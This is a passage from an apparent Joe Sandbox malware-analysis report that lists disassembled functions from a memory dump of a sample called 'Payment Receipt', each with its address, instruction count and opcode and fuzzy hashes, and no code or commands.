                                                                      • Instruction Fuzzy Hash: AEB15170A002668BDB64DF58C890BADB7F5FF84700F0485E9D54AEB281EB74DD85CB21
                                                                      Function 015CE5E7 Relevance: .3, Instructions: 278COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a9d6b86cc1194a6ce9b3084b920ce4258d5e76caf679ca9934efb61f1596f040
                                                                      • Instruction ID: 7deb89194b48a22e012561ec45281af3635f0257c0239ad3f7e6593318ebdb04
                                                                      • Opcode Fuzzy Hash: a9d6b86cc1194a6ce9b3084b920ce4258d5e76caf679ca9934efb61f1596f040
                                                                      • Instruction Fuzzy Hash: 61A1E131E006599FEB36CE98CC49BAEBFE4FB01B54F050159EA01AB2D1D7749D80CB91
                                                                      Function 015E0185 Relevance: .3, Instructions: 276COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b3cca73742a7a94c73b1fec895eaa69e62a686539ac3e781876fe29baeff373d
                                                                      • Instruction ID: 8a4199abc506f25abc8ffbd4ad81a955c21a31d47ac6dc51644b1214e2fef8f0
                                                                      • Opcode Fuzzy Hash: b3cca73742a7a94c73b1fec895eaa69e62a686539ac3e781876fe29baeff373d
                                                                      • Instruction Fuzzy Hash: B6A1F371F007169FEB28CF69C994BAAB7F5FF44314F044429EA05AB285DBB4E811CB90
                                                                      Function 01674500 Relevance: .3, Instructions: 275COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: db1a2d11059d0cdf3e2b2b033ae548e9f89e003077d44464083d6f4d85df2c8d
                                                                      • Instruction ID: b50241e040904e516326796eef913aff18519835223a6d01cad58b9ea39304a3
                                                                      • Opcode Fuzzy Hash: db1a2d11059d0cdf3e2b2b033ae548e9f89e003077d44464083d6f4d85df2c8d
                                                                      • Instruction Fuzzy Hash: 05A1BB72A14212EFD722DF28CD84B6ABBE9FF88704F050528E5859B751DB34ED41CB91
                                                                      Function 01672B57 Relevance: .3, Instructions: 266COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                                      • Instruction ID: 06b96d8ee3d47bed4789351c3b0f0be08b5922edd0cbb0f084cf386aa8d284ad
                                                                      • Opcode Fuzzy Hash: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                                      • Instruction Fuzzy Hash: 97B13771E0065ADFDF29CFA9C890AADBBB5FF88310F14816DE914AB354D730A941CB90
                                                                      Function 016260E0 Relevance: .3, Instructions: 264COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6f81d72b447e043704d3155f2e4a0766ed96f3b0ec5a1fb9020c334992ed327b
                                                                      • Instruction ID: 79420ebcf816fd43b3db9d604c702d7a8ddfaf087c176fc5d039d86fb53e0acf
                                                                      • Opcode Fuzzy Hash: 6f81d72b447e043704d3155f2e4a0766ed96f3b0ec5a1fb9020c334992ed327b
                                                                      • Instruction Fuzzy Hash: 32919271D01626AFDB15CFA8DC84BAEBFB5AF49710F158169EA10AB341D734E9008FA0
                                                                      Function 015BE3F0 Relevance: .3, Instructions: 261COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e30c05b74df8bcdd3417147a50cf456af7f933f250c71d23db0c60876fe5678a
                                                                      • Instruction ID: 91a9530a2497353f7fc7a03313fea181d60b2a7d734ff9572869be4d9adcca9e
                                                                      • Opcode Fuzzy Hash: e30c05b74df8bcdd3417147a50cf456af7f933f250c71d23db0c60876fe5678a
                                                                      • Instruction Fuzzy Hash: 17912431A00616CBEB259B68C8C5BFEBBE2FF84714F094469E9059F381E738D941C7A1
                                                                      Function 015D4750 Relevance: .3, Instructions: 251COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9a4050b41c6a135279948fe63c017d1f443f312da45434136b065312031d96b8
                                                                      • Instruction ID: c61dcbb205209b3931a0443bc88e2d9bb259175536ae908ca98b26b4cc72a132
                                                                      • Opcode Fuzzy Hash: 9a4050b41c6a135279948fe63c017d1f443f312da45434136b065312031d96b8
                                                                      • Instruction Fuzzy Hash: BB812B31A042968BEB318EACCCC22ADBFA1FF52250B1D4A7AD543DFB45C274D846C791
                                                                      Function 015EDBF9 Relevance: .2, Instructions: 244COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8549c86322cfe958a29a8ef1ef3c7120cca5d0c53e5cdecc8be8a9795373b755
                                                                      • Instruction ID: 3de99538ba3561c4d2a1d1bbfa7dc8b0755771371705841378bb2fbae06ce1d6
                                                                      • Opcode Fuzzy Hash: 8549c86322cfe958a29a8ef1ef3c7120cca5d0c53e5cdecc8be8a9795373b755
                                                                      • Instruction Fuzzy Hash: 36914272910A068FE729CF6DC98D666BBF0FF55364B148A18D5EADF6A0C335E521CB00
                                                                      Function 0166F7B0 Relevance: .2, Instructions: 242COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 839d31731b334ea84a2f85d801503c8b60957082b4eb70e22f81885658883c2c
                                                                      • Instruction ID: 67d8215363b47ea30d8252dd43723a6894fa929fd583da50a35af56f67d2b419
                                                                      • Opcode Fuzzy Hash: 839d31731b334ea84a2f85d801503c8b60957082b4eb70e22f81885658883c2c
                                                                      • Instruction Fuzzy Hash: EC91C471A00216ABEB15CF28DC907AABBFABF84314F1585B8E955DB381D774E901CB90
                                                                      Function 0166F43F Relevance: .2, Instructions: 241COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 259b83524ff305f285d1cd68ff5a4ca33d46cdbd237c81104049d010604d6ddd
                                                                      • Instruction ID: 65c6a330851fe251a093cf18196e1e1a89ab3f8beadec7de3fe534f550582341
                                                                      • Opcode Fuzzy Hash: 259b83524ff305f285d1cd68ff5a4ca33d46cdbd237c81104049d010604d6ddd
                                                                      • Instruction Fuzzy Hash: 8491F132A001159BCB08CF79DCA56BEBBF6FF88210F1981A9D815DB386DB34E905CB50
                                                                      Function 016681CC Relevance: .2, Instructions: 232COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 078fbee17b7d351a0f7698668512d3d20ac33482b164c235315fdf452063c930
                                                                      • Instruction ID: 5dcc24a3a0e5d72b5aaddd3e9964bd2880166d8cf031617ebb1f5f2add7d50b0
                                                                      • Opcode Fuzzy Hash: 078fbee17b7d351a0f7698668512d3d20ac33482b164c235315fdf452063c930
                                                                      • Instruction Fuzzy Hash: AE818471E006169BCB14CFBDCC805AEB7FDFF88214B14822AD961E7394D7749952CB90
                                                                      Function 015B0E59 Relevance: .2, Instructions: 231COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5a5726be826ad19c706a208c02c36e25e5f4f835953d492ac917319c8f19da4b
                                                                      • Instruction ID: f4c1af5f4fb4b8b0c5f007e5b335ebacf2133d39baa7ae148e057bfe6afbbaa8
                                                                      • Opcode Fuzzy Hash: 5a5726be826ad19c706a208c02c36e25e5f4f835953d492ac917319c8f19da4b
                                                                      • Instruction Fuzzy Hash: 13818E31B005599FDB15CE6EC8D49AFBBF2FF85210B288299E8559F389D730E941CB90
                                                                      Function 015F6ACC Relevance: .2, Instructions: 226COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d8d85f4634323db4fa97e48750b2ce877e109c82f7bc254016b04d1c1e641abe
                                                                      • Instruction ID: 8e1e8760e035ce4c284ef50ee4d3f69148ad7e9c77c06f9652f431cc3e71f66a
                                                                      • Opcode Fuzzy Hash: d8d85f4634323db4fa97e48750b2ce877e109c82f7bc254016b04d1c1e641abe
                                                                      • Instruction Fuzzy Hash: 30819471E0061A9FDB28CF69D940ABEBBF9FB48700F04852EE555EB640E334D940CBA4
                                                                      Function 0165E4F6 Relevance: .2, Instructions: 224COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 29d3106a331fbd62639d0c06320d71288ce1558c80e420752fe4e0b5d341171b
                                                                      • Instruction ID: 4370eb886639f7e1eb4b3067aeb9861c56b75dfd376a87b2983fd59c57a81e6d
                                                                      • Opcode Fuzzy Hash: 29d3106a331fbd62639d0c06320d71288ce1558c80e420752fe4e0b5d341171b
                                                                      • Instruction Fuzzy Hash: 24818072E002159BDF58CF58C9906ADFBF6EF88310F198169D816EB385D7359E41CB90
                                                                      Function 0166AB40 Relevance: .2, Instructions: 222COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                      • Instruction ID: 57f51c955e561e2cbbb105b94ffbaaab15a2c5a8b69e2cf0a2040968ea0467d8
                                                                      • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                      • Instruction Fuzzy Hash: E8818372A002069FDF19DF98C890AAEBBFAFF94310F14856DD916AB385D734E901CB50
                                                                      Function 015DE284 Relevance: .2, Instructions: 212COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9f1c3bbd02990c7bab33e1b5c7a80cbb7c5fac8e0af68d8c1947fbbd1742b653
                                                                      • Instruction ID: 38aeb8679c8fef874dc3ad8ab577be1ca59d5bfa1f7c96e4b858bda7738330e6
                                                                      • Opcode Fuzzy Hash: 9f1c3bbd02990c7bab33e1b5c7a80cbb7c5fac8e0af68d8c1947fbbd1742b653
                                                                      • Instruction Fuzzy Hash: 6A816171A00609AFDB25CFA9C881AEEBBF9FF88354F14442DE555AB350DB70AC45CB60
                                                                      Function 015CB950 Relevance: .2, Instructions: 209COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5977d8e10a9ecd301ef2eb229d0016ce0c6063f5e2cff0923f3b60ba8a445138
                                                                      • Instruction ID: 2f5ab1ebbe310a87867da4c5a2332d186206347f560914dc36e0d05fa489e8fb
                                                                      • Opcode Fuzzy Hash: 5977d8e10a9ecd301ef2eb229d0016ce0c6063f5e2cff0923f3b60ba8a445138
                                                                      • Instruction Fuzzy Hash: 477105306002618EE729CE6ECD4177677E2BB84B85F14895DE9C68F2C5D7B6E802CB60
                                                                      Function 015BC640 Relevance: .2, Instructions: 206COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: cfde19472a7b7b5df9cd1826bb9502a3c13484e7edc0ed006f78470c198ab30a
                                                                      • Instruction ID: f403600237f4599df80f77a2684e946c7a189e9e30cbca83a1643ec23b1535b5
                                                                      • Opcode Fuzzy Hash: cfde19472a7b7b5df9cd1826bb9502a3c13484e7edc0ed006f78470c198ab30a
                                                                      • Instruction Fuzzy Hash: EA71BE75C00625DBCB2ACF59D9907FEBBB9FF58710F14461AE842AB390E7709811CB94
                                                                      Function 016547A0 Relevance: .2, Instructions: 202COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: fdc73de78dfef5c5a696b4c0c564fe0e16604c98ca57d26ebbf8457416978add
                                                                      • Instruction ID: 583d3f80ca49b20293c74eb93c72be00690b615f842c483da04c8203fc7f82cc
                                                                      • Opcode Fuzzy Hash: fdc73de78dfef5c5a696b4c0c564fe0e16604c98ca57d26ebbf8457416978add
                                                                      • Instruction Fuzzy Hash: CD718071901305EFDFA4CF69DE44A9ABBFDFF80300F10519AEA15AB258EB718984CB54
                                                                      Function 015B260B Relevance: .2, Instructions: 201COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d578a1ca5618dc8a6f9a66e680fa1adb05631fcc61f9e6ae2e26e8dc7660fd30
                                                                      • Instruction ID: 2f680c78ec33ea6d752e3d68c1f2e7cf6eb3faf5d37df39191642a27229c69c6
                                                                      • Opcode Fuzzy Hash: d578a1ca5618dc8a6f9a66e680fa1adb05631fcc61f9e6ae2e26e8dc7660fd30
                                                                      • Instruction Fuzzy Hash: 7A71B3356046428FD316DF2CC884BAAB7E5FF84310F0585A9E859CF352EB34E846CBA5
                                                                      Function 016670E9 Relevance: .2, Instructions: 201COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e022cd59669680499c3cc8cf8c8ab540cdb0f662bf81338d85c25435f434344e
                                                                      • Instruction ID: c172c8f015d4920f9016d44508a8b155481d34eda1eccbab3becf9af89e9cb98
                                                                      • Opcode Fuzzy Hash: e022cd59669680499c3cc8cf8c8ab540cdb0f662bf81338d85c25435f434344e
                                                                      • Instruction Fuzzy Hash: 1C61C671E00217DBDB11AFA9CC919BFF77EBF94209F14842AE911A7340EB74D9418BA0
                                                                      Function 0165F0CC Relevance: .2, Instructions: 199COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 272a3d46ce51ff10df4ff8fbc4d8b11bfadc35a472155630c8b033d9ea8cafb1
                                                                      • Instruction ID: b35f40f00905d85ff2b1785c34bec229944abe383d5f59ea913d71cc6b8c47ff
                                                                      • Opcode Fuzzy Hash: 272a3d46ce51ff10df4ff8fbc4d8b11bfadc35a472155630c8b033d9ea8cafb1
                                                                      • Instruction Fuzzy Hash: 51719078A00622DBDBA4CFA9C88027AB7F1FF45745F6484AEDD4297740E770E951CB90
                                                                      Function 0162035C Relevance: .2, Instructions: 198COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                      • Instruction ID: 41b138b6722fe9e49b13fb7f6106a8f3678a5c8d7aa34e80c38e00bcce3cfb91
                                                                      • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                      • Instruction Fuzzy Hash: 59716D71A0061AEFDB10DFA9C984ADEBBB9FF88704F104569E505BB250DB34EA01CF90
                                                                      Function 016362A0 Relevance: .2, Instructions: 198COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 24224c116169e4fcc55103bbd70c11754004054421f65b5a306ecd7c85c4eb2b
                                                                      • Instruction ID: fde371a17abdb0eb53cd944325dfa9b42493bdb80e863e65990bb7cedf17916d
                                                                      • Opcode Fuzzy Hash: 24224c116169e4fcc55103bbd70c11754004054421f65b5a306ecd7c85c4eb2b
                                                                      • Instruction Fuzzy Hash: 8171D232A00702BFEB269F18CC44F66BBF6FF80710F148418E6569B2A1D775EA45CB50
                                                                      Function 01667A46 Relevance: .2, Instructions: 193COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e42802355757338f3df971157b01b5b23009c52fc79a2f645535e162f9efcc2c
                                                                      • Instruction ID: 410aadd5d30cb29a445f45440733943b861a169c16cf5fa800b96e8a1bc3f4f3
                                                                      • Opcode Fuzzy Hash: e42802355757338f3df971157b01b5b23009c52fc79a2f645535e162f9efcc2c
                                                                      • Instruction Fuzzy Hash: 8C515875A0012A5BCB18DF6DCC80ABEBBEAEF88314F144169ED55DB385DB34C902C7A0
                                                                      Function 01678324 Relevance: .2, Instructions: 192COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9e5535c5e6a527f4604292e28e1ba14fa0869b3e3503051fe5ccd42a4302afe6
                                                                      • Instruction ID: 29c07e735af24f1aaccc8556d94cf982bb4921a368f39751943c8182881aafa1
                                                                      • Opcode Fuzzy Hash: 9e5535c5e6a527f4604292e28e1ba14fa0869b3e3503051fe5ccd42a4302afe6
                                                                      • Instruction Fuzzy Hash: 99710A71E0020AAFEB15DF94CC45FEEBBBDFB44360F104169E615AB290E774AA45CB90
                                                                      Function 0166132D Relevance: .2, Instructions: 188COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 485140ee3de46f29d9293de0bb8877299f34289d99ba170ac5531bdc0500cb5a
                                                                      • Instruction ID: 97fa8cbe20b6af7843e224b262363172cdfbbbadc420a80813ee238649c14081
                                                                      • Opcode Fuzzy Hash: 485140ee3de46f29d9293de0bb8877299f34289d99ba170ac5531bdc0500cb5a
                                                                      • Instruction Fuzzy Hash: EA818071A00205DFCB09CF58C890AAEBBF5FF89300F1581A9D859EB345D734EA51CB90
                                                                      Function 0165A250 Relevance: .2, Instructions: 184COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 22e532d026b938ccde3b20d2c095f967f970a6ec40f846fcde398f5b96ce8552
                                                                      • Instruction ID: 424e6d923604d0788196e5bc153cd0110afe212b6716830a7c8a324bc32c1ca4
                                                                      • Opcode Fuzzy Hash: 22e532d026b938ccde3b20d2c095f967f970a6ec40f846fcde398f5b96ce8552
                                                                      • Instruction Fuzzy Hash: F351AE72905612AFD751DEA8CC84E6BBBE8EFC4750F010A29BE80DB250D770ED0587A2
                                                                      Function 0166CE93 Relevance: .2, Instructions: 172COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: adaef8c90542e90ae6fae2448e28977f4ff712f71b9da8e8631f75b3b546fe51
                                                                      • Instruction ID: 670bd51959e9400781d6971cae8264d1c357d9abfed2c75089cc26ba84259689
                                                                      • Opcode Fuzzy Hash: adaef8c90542e90ae6fae2448e28977f4ff712f71b9da8e8631f75b3b546fe51
                                                                      • Instruction Fuzzy Hash: 96512432704A429BD711DE2D8C5076BBBEEAFD5250F19846DE9D5CB342DB30D80AC7A1
                                                                      Function 01648350 Relevance: .2, Instructions: 161COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 41aef3a10b00a1919575264aa9818109171f438917f32599ed5aae947294cbe6
                                                                      • Instruction ID: 59d5ddb64c5449b8c95602eca9147109ad7e8b0cc0ecbf798cb2fd2cfce23b3c
                                                                      • Opcode Fuzzy Hash: 41aef3a10b00a1919575264aa9818109171f438917f32599ed5aae947294cbe6
                                                                      • Instruction Fuzzy Hash: 3151AC70900705DFD721DFAAC884AABFBFDBF94710F10461ED292976A1C7B0A945CB90
                                                                      Function 015DE443 Relevance: .2, Instructions: 158COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e34761498080e15225bdeedc2a38c69c631c88907abf85b29d6ccbd6ab266dbd
                                                                      • Instruction ID: cb5500e48e1e434df34d32bc4d67ff33df55260d5902f108ab93b4889b6cae48
                                                                      • Opcode Fuzzy Hash: e34761498080e15225bdeedc2a38c69c631c88907abf85b29d6ccbd6ab266dbd
                                                                      • Instruction Fuzzy Hash: 49516971210A06DFCB62EFA9C981EAAB7F9FF54784F44082AE5429B260D730E941CB50
                                                                      Function 01644180 Relevance: .2, Instructions: 156COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
